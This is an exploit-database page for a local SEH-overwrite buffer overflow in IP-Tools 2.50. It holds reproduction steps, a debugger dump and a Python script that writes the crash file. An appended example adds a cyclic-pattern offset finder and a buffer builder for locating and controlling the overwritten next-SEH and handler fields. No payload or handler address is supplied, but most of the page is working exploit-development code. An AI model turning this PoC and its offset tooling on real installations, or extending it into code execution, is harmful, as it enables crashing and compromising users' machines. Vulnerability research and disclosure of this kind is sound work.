IP-Tools 2.50 – Local Buffer Overflow (PoC)

  • Author: Rafael Pedrero
    Date: 2019-01-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46286/
  • # Exploit Title: IP TOOLS v2.50 - Denial of Service (PoC) and SEH Overwrite Crash PoC
    # Discovery by: Rafael Pedrero
    # Discovery Date: 2018-12-20
    # Vendor Homepage: https://www.ks-soft.net/ip-tools.eng/index.htm
    # Software Link: https://www.ks-soft.net/ip-tools.eng/index.htm / https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe
    # Tested Version: 2.50
    # Tested on: Windows XP SP3
    # Vulnerability Type: Denial of Service (DoS) / Local Buffer Overflow (SEH overwrite)
    
    # Steps to Reproduce the Crash:
    # 1.- Run IP-Tools.exe
    # 2.- Go to the SNMP Scanner tab and copy the content of IPTools_Crash.txt to the clipboard
    # 3.- Paste the content into the 'From Addr' and 'To Addr' fields
    # 4.- Click the 'Start' button; the application crashes.
    #
    # The SEH chain in the debugger output below shows the next-SEH pointer
    # (42424242, the 'BBBB' marker) and the SE handler (43434343, the 'CCCC'
    # marker) both overwritten by attacker-controlled bytes, so this is a
    # controlled SEH overwrite rather than only a plain crash. The PoC stops
    # at the crash; no handler address or payload is supplied.
    
    
    '''
    SEH chain of main thread
    Address    SE handler
    0012F4B4   43434343
    42424242   *** CORRUPT ENTRY ***
    
    EAX 0012F4CC
    ECX 00000000
    EDX 44444444
    EBX 0012F4CC
    ESP 0012E490
    EBP 0012F4DC ASCII
    "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
    ESI 0012E4A4 ASCII
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    EDI 02256720 ASCII
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    EIP 00403F70 IP-TOOLS.00403F70
    C 0  ES 0023 32bit 0(FFFFFFFF)
    P 1  CS 001B 32bit 0(FFFFFFFF)
    A 0  SS 0023 32bit 0(FFFFFFFF)
    Z 0  DS 0023 32bit 0(FFFFFFFF)
    S 0  FS 003B 32bit 7FFDD000(FFF)
    T 0  GS 0000 NULL
    D 0
    O 0  LastErr ERROR_SUCCESS (00000000)
    EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
    ST0 empty
    ST1 empty
    ST2 empty
    ST3 empty
    ST4 empty
    ST5 empty
    ST6 empty
    ST7 empty
                   3 2 1 0      E S P U O Z D I
    FST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0  (LT)
    FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0
    '''
    
    #!/usr/bin/env python
    
    # Buffer layout, matching the SEH chain in the crash dump above:
    #   4112 x 'A'  junk up to the SEH record (visible in ESI/EDI)
    #   'BBBB'      next-SEH pointer (shows as 42424242, *** CORRUPT ENTRY ***)
    #   'CCCC'      SE handler       (shows as 43434343)
    #   'D' * ...   filler up to a 5000-byte total (visible in EDX/EBP)
    junk = "\x41" * 4112
    crash = junk + "BBBB" + "CCCC" + "D" * (5000 - len(junk) - 8)
    with open("IPTools_Crash.txt", "w") as f:
        f.write(crash)
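The PoC above arrives at the 4112-byte offset with fixed fill bytes. The following is an added example, not part of Rafael Pedrero's PoC or of IP-Tools: it finds the nSEH/SEH offsets with a Metasploit-style cyclic pattern (unique 4-byte windows, so a DWORD read from the debugger's SEH chain maps back to one offset), then rebuilds the crash buffer with the next-SEH and handler fields spelled out and reads the record back to check it against the dump. The 4112 offset, the 5000-byte total and the BBBB/CCCC markers come from the page; that the 'From Addr'/'To Addr' fields accept a 5000-byte alphanumeric pattern is an assumption, as are the file names.

```python
#!/usr/bin/env python3
# Added example (not the original PoC): pattern-based offset discovery for the
# IP-Tools SEH overwrite, plus an explicit rebuild of the crash buffer.
# Assumed: the target field accepts the pattern as pasted; file names are
# illustrative.
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes


def cyclic_pattern(length):
    """Metasploit-style 'Aa0Aa1Aa2...' pattern. Every 4-byte window is unique
    within the first 20280 bytes, so a DWORD seen in a register or in the SEH
    chain maps back to exactly one offset in the buffer."""
    if length > MAX_UNIQUE:
        raise ValueError("pattern is only unique up to %d bytes" % MAX_UNIQUE)
    chunks = []
    size = 0
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                size += 3
                if size >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value, length=MAX_UNIQUE):
    """Map the DWORD the debugger prints for nSEH or the SE handler after a
    pattern run (little-endian, e.g. 0x31684630) back to the offset of those
    four bytes inside the pattern."""
    needle = struct.pack("<I", value).decode("ascii")
    offset = cyclic_pattern(length).find(needle)
    if offset < 0:
        raise ValueError("0x%08X is not a value from the pattern" % value)
    return offset


def build_crash(nseh_offset=4112, total=5000, nseh=b"BBBB", seh=b"CCCC"):
    """Rebuild the PoC layout: junk up to the SEH record, the next-SEH
    pointer, the SE handler, then filler so the file stays `total` bytes."""
    tail = total - nseh_offset - len(nseh) - len(seh)
    if tail < 0:
        raise ValueError("total %d is too small for offset %d" % (total, nseh_offset))
    return b"A" * nseh_offset + nseh + seh + b"D" * tail


def seh_record(buf, nseh_offset=4112):
    """Read back the (nSEH, SE handler) DWORDs the debugger would display for
    this buffer, so the layout can be checked against the crash dump before
    pasting it into the application."""
    return struct.unpack_from("<II", buf, nseh_offset)


if __name__ == "__main__":
    # Step 1: write a pattern to paste into 'From Addr' / 'To Addr'.
    with open("IPTools_Pattern.txt", "w") as f:
        f.write(cyclic_pattern(5000))
    # Step 2 (after the crash): feed the nSEH value shown in the SEH chain to
    # pattern_offset(); 0x31684630 is the window at offset 4112 of the pattern.
    print("nSEH offset:", pattern_offset(0x31684630))
    # Step 3: rebuild the buffer with explicit fields and check the record.
    buf = build_crash()
    print("nSEH=%08X SEH=%08X" % seh_record(buf))
    with open("IPTools_Crash.txt", "wb") as f:
        f.write(buf)
```

With the original PoC's offsets, seh_record() returns (0x42424242, 0x43434343), the same pair that appears in the dump's SEH chain; a mismatch here means the fill length, not the target, is wrong. The handler offset is always the nSEH offset plus 4, so one pattern run yields both.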